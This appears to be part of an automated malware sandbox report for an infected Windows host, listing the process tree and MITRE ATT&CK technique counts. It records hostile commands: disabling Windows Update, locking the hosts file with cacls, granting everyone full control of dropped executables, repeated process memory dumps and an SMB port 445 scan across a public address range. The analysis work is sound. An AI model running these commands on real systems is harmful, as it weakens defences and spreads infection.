  C:\Windows\SysWOW64\cmd.exe (PID 3472)
    command line: cmd /c sc config wuauserv start= disabled
    C:\Windows\SysWOW64\sc.exe (PID 4196)
      command line: sc config wuauserv start= disabled
      - Launches sc.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 4432)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 388 C:\Windows\TEMP\lbtermtbs\388.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\xohudmc.exe (PID 4012)
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 2936)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 1736 C:\Windows\TEMP\lbtermtbs\1736.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 1956)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2560 C:\Windows\TEMP\lbtermtbs\2560.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 1728)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2808 C:\Windows\TEMP\lbtermtbs\2808.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 3960)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2952 C:\Windows\TEMP\lbtermtbs\2952.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 2020)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3048 C:\Windows\TEMP\lbtermtbs\3048.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 420)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3756 C:\Windows\TEMP\lbtermtbs\3756.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 1940)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3880 C:\Windows\TEMP\lbtermtbs\3880.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 4532)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3972 C:\Windows\TEMP\lbtermtbs\3972.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 3772)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 4056 C:\Windows\TEMP\lbtermtbs\4056.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 4724)
    command line: cmd.exe /c C:\Windows\lbtermtbs\etamgyklt\scan.bat
    C:\Windows\lbtermtbs\etamgyklt\itfnybsmt.exe (PID 688)
      command line: itfnybsmt.exe TCP 191.101.0.1 191.101.255.255 445 512 /save
      - Executes dropped EXE
      - Drops file in Windows directory
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 6460)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2164 C:\Windows\TEMP\lbtermtbs\2164.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 6668)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3216 C:\Windows\TEMP\lbtermtbs\3216.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 6192)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2272 C:\Windows\TEMP\lbtermtbs\2272.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 7152)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3848 C:\Windows\TEMP\lbtermtbs\3848.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 6212)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 348 C:\Windows\TEMP\lbtermtbs\348.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 4884)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 4724 C:\Windows\TEMP\lbtermtbs\4724.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 876)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2860 C:\Windows\TEMP\lbtermtbs\2860.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 2136)
    command line: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    C:\Windows\SysWOW64\cmd.exe (PID 2804)
      command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe (PID 4836)
      command line: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    C:\Windows\SysWOW64\cmd.exe (PID 6648)
      command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe (PID 7072)
      command line: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    C:\Windows\SysWOW64\cmd.exe (PID 6892)
      command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe (PID 3212)
      command line: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4024)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1028 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:8

C:\Windows\SysWOW64\tyxtye.exe (PID 2248)
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE (PID 4988)
  command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F
  C:\Windows\system32\cmd.exe (PID 2168)
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  C:\Windows\system32\cacls.exe (PID 4964)
    command line: cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F

C:\Windows\system32\cmd.EXE (PID 3100)
  command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F
  C:\Windows\system32\cmd.exe (PID 3316)
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  C:\Windows\system32\cacls.exe (PID 1476)
    command line: cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F

C:\Windows\system32\cmd.EXE (PID 3524)
  command line: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\guwlsyl.exe
  C:\Windows\ime\guwlsyl.exe (PID 3772)
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE (PID 3776)
  command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F
  C:\Windows\system32\cmd.exe (PID 6624)
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  C:\Windows\system32\cacls.exe (PID 6716)
    command line: cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F

C:\Windows\system32\cmd.EXE (PID 1996)
  command line: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\guwlsyl.exe
  C:\Windows\ime\guwlsyl.exe (PID 2804)
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE (PID 5076)
  command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F
  C:\Windows\system32\cmd.exe (PID 6760)
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  C:\Windows\system32\cacls.exe (PID 6944)
    command line: cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F
Network
MITRE ATT&CK Enterprise v15 (technique name followed by the number of matching behaviours)
Persistence
- Boot or Logon Autostart Execution: 1
- Registry Run Keys / Startup Folder: 1
- Create or Modify System Process: 2
- Windows Service: 2
- Scheduled Task/Job: 1
Privilege Escalation
- Boot or Logon Autostart Execution: 1
- Registry Run Keys / Startup Folder: 1
- Create or Modify System Process: 2
- Windows Service: 2
- Scheduled Task/Job: 1
Defense Evasion
- Impair Defenses: 1
- Disable or Modify System Firewall: 1
- Modify Registry: 1
Downloads